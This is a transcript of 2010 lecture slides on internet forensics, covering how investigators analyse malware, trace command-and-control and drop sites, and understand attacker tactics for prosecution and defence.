Transcript Internet Vulnerabilities & Criminal Activity

Internet Vulnerabilities &
Criminal Activity
Internet Forensics
12.1
April 26, 2010
Internet Forensics & Computer Forensics
 Computer Forensics




Computer off / power it off
Hard drive is imaged
Examination made of hard drive copy
No live capture of memory
 Internet Forensics
 Done while computer is on
 May or may not examine memory
 Network activity is captured and analyzed
Malware Analysis
 Goal - provide insight into attackers
 Malware has two purposes
 Steal information from victim computers
 Commander victim computer’s resources for
attacker’s use
 Malware secondary features
 Propagation
 Locate & terminate security programs &
competing malware
 Hide itself from system administrators
Malware Programs
 Most derived from a small, stable base
of existing code
 Small changes to obfuscation scheme
 Command & control credentials change
 No need to change what works
 Custom programmed malware unlikely
to be identified by security software
Extracting Information
 Author vs Attacker
 More interested in the attacker
 Information that can lead to attackers
identity
 How malware interacts with the Internet
 What type of information is being targeted
 Commonalities with previously analyzed
software
Malware Network Interactions
 Receiving commands
 Command & control site
 Exfiltrate data
 Drop site
 Unique identifier (advertising fraud)
Identifying Advertising Revenue
 Advertising fraud
 Pay-per-view, pay-per-click, pay-per-install
 To receive revenue, web site operator must
be identified
 Tracking number
 May be found in malware
 May be found in the URL for the advertisement
 Extracted tracking number starting point to
identifying recipient
Identifying Drop Sites
 Malware that steals data will upload data to a
specific site for later retrieval
 Passwords, keystrokes, network traffic, documents
 Data may be uploaded to drop site using:
 HTTP
 FTP
 E-mail
Identifying Drop Sites cont.
 Drop site location
 May be hard coded into malware
 May be found by query to web site or IRC channel
 Possible actions once drop site is located
 Analyze traffic to site to help find attacker
 Analyze data at drop site & inform victims and
financial institutions
 Shut down drop site
 Will only work with a hard coded site
Forensic Examination
 Computer is off
 Image the hard drive on site
 Transport computer to lab and image the hard drive
 Examine image in a lab environment
 Computer is on
 Observe & document the following before shutting
machine down




Running processes
Open ports
Memory
Use of encryption
Examination of Malware
 Malware files should be:
 Located, recovered, neutralized to prevent
accidental execution, analyzed
 Antivirus testing
 Can identify known malware
 Information can be obtained from antivirus web
site
 Cannot identify network contact sites
 Anti-virus sites not detailed or accurate enough for
court
Examination of Malware cont.
 Study strings in the binary
 Locates embedded text
 Text may be packed to further obfuscate
 Indicates malware has specific targets
 Runtime Analysis




Run malware in an isolated environment
Use simulation of the Internet & targeted sites
Use network tools to observe malware’s behavior
Look for :
 Method used to transfer data
 Address where data is sent
Examination of Malware cont.
 Reverse Engineering
 Converts file back to source code
 Need some understanding of programming
 Identify sites used for Command & Control
(C&C)
 Central point of communication between malware
& attacker
 C&C sites usually illegally hosted on compromised
servers
 Look for host name / IP number of C&C site
 Attack will normally connect to C&C site using a
proxy or other compromised host
Examination of Malware cont.
 Identify C&C site continued
 Malware identifies C&C site using IP address or
DNS resource record
 IP address more vulnerable as IP address can be shut
down
 DNS resource record can just be resolved to new IP
number
 Nature of DNS record can provide leads
 Contact & payment details
 Other DNS records with same contact information
 Other IP addresses associated with DNS record
 Attackers choice of type of host or network can
provide information on attacker’s activities
Extracting Incidental Artifacts
 Can find other information stored in malware
with investigative value
 Use “strings” command
 Messages or comments from the author or
attacker
 Metadata about the development
environment
 May be placed in malware to intentionally
mislead investigators
 May lead to author not attacker
More to Learn from Malware
 Two different malwares using the same C&C
site may belong to the same attacker
 Why not go after the author?
 Prosecution requires:
 Knowledge
 Intent
 Damages & monetary loss
 Techniques used by malware authors point
out weaknesses in network security
Attackers
 Will balance cost, risk & potential profit
 Sophistication is expensive
 Will only employ sophisticated techniques when
there is sufficient profit
 Will use what ever techniques work
 Understand social behavior
 Security professionals have limited time /
resources, work fixed hours
 Infrastructure used for attack will eventually be
shut down
 Schedule attacks to maximize time till attack is
noticed
Attackers cont.
 Understand the culture of victims being
targeted
 E-mail, application icons, programs named to be
as enticing as possible
 Exploit jurisdictions & geography
 Know the law enforcement difficulties working
internationally
 Use several proxies in different counties to route
connections
 Know which countries are weak on cyber
enforcement
Attackers cont.
 Monetary thresholds & other crimes
 Know that most countries have monetary limits on
crimes pursued
 Internet provides “protection” for attackers
 Rules for juveniles different - attackers exploit this
 Study & evade network defenses
 Understand how firewalls & antivirus software
works
 Have learned how to circumvent security
measures
 Outbound connections to C&C and drop sites
 Use ubiquitous HTTP protocol
Supporting Other Investigations
 Malware code analysis may assist in other
computer forensic investigations
 Combating the “Malware on the Machine”
defense
 Defendants claim illegal materials on computer
due to malware
 Examine malware on the machine
 Examine network traffic records
 Could the malware have committed the crime
 Is functionality present in the malware to commit
the attack